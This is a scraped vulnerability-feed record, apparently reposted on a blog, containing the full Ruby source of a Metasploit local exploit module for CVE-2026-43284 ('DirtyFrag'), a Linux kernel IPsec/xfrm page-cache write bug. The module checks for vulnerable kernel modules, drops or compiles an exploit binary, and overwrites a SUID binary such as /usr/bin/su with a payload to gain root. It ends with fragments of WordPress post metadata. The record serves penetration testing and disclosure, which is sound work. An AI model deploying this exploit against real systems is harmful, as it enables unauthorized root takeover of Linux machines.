{“lastseen”:”2026-05-21T19:28:02″,”description”:”CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed \\”DirtyFrag\\”, the bug allows a local unprivileged user to gain write access to read-only…”,”published”:”2026-05-21T19:01:04″,”modified”:”2026-05-21T19:01:04″,”type”:”metasploit”,”title”:”xfrm-ESP Page-Cache Write via CVE-2026-43284″,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_43284_DIRTY_FRAG-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-43284″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = GoodRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Linux::Priv\\n include Msf::Post::Linux::Kernel\\n include Msf::Post::Linux::System\\n include Msf::Post::Linux::Compile\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘xfrm-ESP Page-Cache Write via CVE-2026-43284’,\\n ‘Description’ =\\u003e %q{\\n CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm\\n subsystem affecting ESP (Encapsulating Security Payload) fragmentation. Dubbed\\n \\”DirtyFrag\\”, the bug allows a local unprivileged user to gain write access to read-only\\n page-cache pages by triggering a race condition in how the kernel handles shared fragments\\n when processing ESP-encapsulated UDP packets. The exploit overwrites a SUID binary on disk\\n to execute an arbitrary payload as root.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Hyunwoo Kim’, # Discovery\\n ‘Giovanni Heward’, # Original module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-43284’],\\n [‘URL’, ‘https:\/\/github.com\/V4bel\/dirtyfrag’],\\n ],\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘Platform’ =\\u003e [ ‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n ‘DisclosureDate’ =\\u003e ‘2026-05-08’,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘Stability’ =\\u003e [ CRASH_OS_DOWN ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘WRITABLE_DIR’, [ true, ‘Directory to write files to’, ‘\/tmp’ ]),\\n OptString.new(‘SUID_BINARY_PATH’, [ true, ‘The path to a suid binary’, ‘\/usr\/bin\/su’ ])\\n ])\\n end\\n\\n def check\\n dirtyfrag_modprobe = cmd_exec(‘ls \/etc\/modprobe.d\/ | grep -e dirty -e dirty-frag -e dirtyfrag’)\\n\\n return CheckCode::Safe(‘The machine seems to be patched’) unless dirtyfrag_modprobe.blank?\\n\\n vuln_modules = %w[esp ipcomp]\\n return CheckCode::Unknown(‘The vulnerable modules have not been detected’) unless kernel_modules.any? { |m| vuln_modules.include?(m) }\\n\\n kernel_version = Rex::Version.new kernel_release.split(‘-‘).first\\n\\n return CheckCode::Safe(‘The kernel version is older than the commit when bug was introduced’) if kernel_version \\u003c Rex::Version.new(‘4.10’)\\n\\n CheckCode::Appears(‘The target is vulnerable, vulnerable module detected and no mitigation detected’)\\n end\\n\\n def exploit\\n suid_binary_path = datastore[‘SUID_BINARY_PATH’]\\n\\n fail_with(Failure::BadConfig, \\”The #{suid_binary_path} does not exists on target system\\”) unless setuid?(suid_binary_path)\\n\\n payload_dir = datastore[‘WRITABLE_DIR’]\\n fail_with(Failure::NoAccess, ‘Cannot write into WRITABLE_DIR, make sure you select writable directory’) unless writable?(payload_dir)\\n\\n arch = kernel_arch\\n\\n cmd_payload = framework.payloads.create(\\”linux\/#{arch}\/exec\\”)\\n fail_with(Failure::NoTarget, \\”#{arch} targets are not supported.\\”) if cmd_payload.nil? || !cmd_payload.options.key?(‘PrependSetuid’)\\n\\n cmd_payload.datastore[‘CMD’] = payload.encoded\\n cmd_payload.datastore[‘PrependSetuid’] = true\\n elf = cmd_payload.generate_simple(‘Format’ =\\u003e ‘elf’)\\n\\n # add padding\\n elf += \\”\\\\xff\\” * ((4 – (elf.size % 4)) % 4)\\n\\n exploit_file = \\”#{payload_dir}\/.#{Rex::Text.rand_text_alpha_lower(6..12)}\\”\\n\\n if live_compile?\\n vprint_status(‘Live compiling exploit on system…’)\\n exploit_c = exploit_data(‘CVE-2026-43284’, ‘CVE_2026_43284.c’)\\n upload_and_compile(exploit_file, exploit_c)\\n else\\n\\n fail_with(Failure::BadConfig, ‘Precompiled exploit only supported for x64, x86, Arm64 and Armel’) unless [ARCH_X64, ARCH_X86, ARCH_AARCH64, ARCH_ARMLE].include?(arch)\\n vprint_status(‘Dropping pre-compiled exploit on system…’)\\n\\n exploit_bin = exploit_data(‘CVE-2026-43284’, \\”CVE_2026_43284_#{arch}\\”)\\n upload_and_chmodx(exploit_file, exploit_bin)\\n end\\n\\n register_file_for_cleanup(exploit_file)\\n\\n print_status(%(Trying to run the exploit: \\”echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}\\”))\\n # patch the setuid file\\n response = cmd_exec(\\”echo -n #{Base64.strict_encode64(elf)} | base64 -d | #{exploit_file} #{elf.size} #{suid_binary_path}\\”)\\n\\n fail_with(Failure::NotVulnerable, ‘The target machine does not seem to be vulnerable’) unless response.include?(‘payload delivered’)\\n\\n print_status(‘Running the payload’)\\n # run the payload\\n cmd_exec(suid_binary_path.to_s)\\n end\\n\\n def on_new_session(session)\\n print_status(‘Restoring balance in galaxy’)\\n if session.type.eql?(‘meterpreter’)\\n session.core.use(‘stdapi’) unless session.ext.aliases.include?(‘stdapi’)\\n session.sys.process.execute(‘\/bin\/sh’, \\”-c ‘echo 3 \\u003e \/proc\/sys\/vm\/drop_caches\\”)\\n else\\n session.shell_command_token(‘echo 3 \\u003e \/proc\/sys\/vm\/drop_caches’)\\n end\\n\\n super\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/cve_2026_43284_dirty_frag.rb”,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/cve_2026_43284_dirty_frag\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-21T19:28:02″,”description”:”CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec\/xfrm subsystem affecting ESP Encapsulating Security Payload fragmentation. Dubbed \\”DirtyFrag\\”, the bug allows a local…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-56156","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n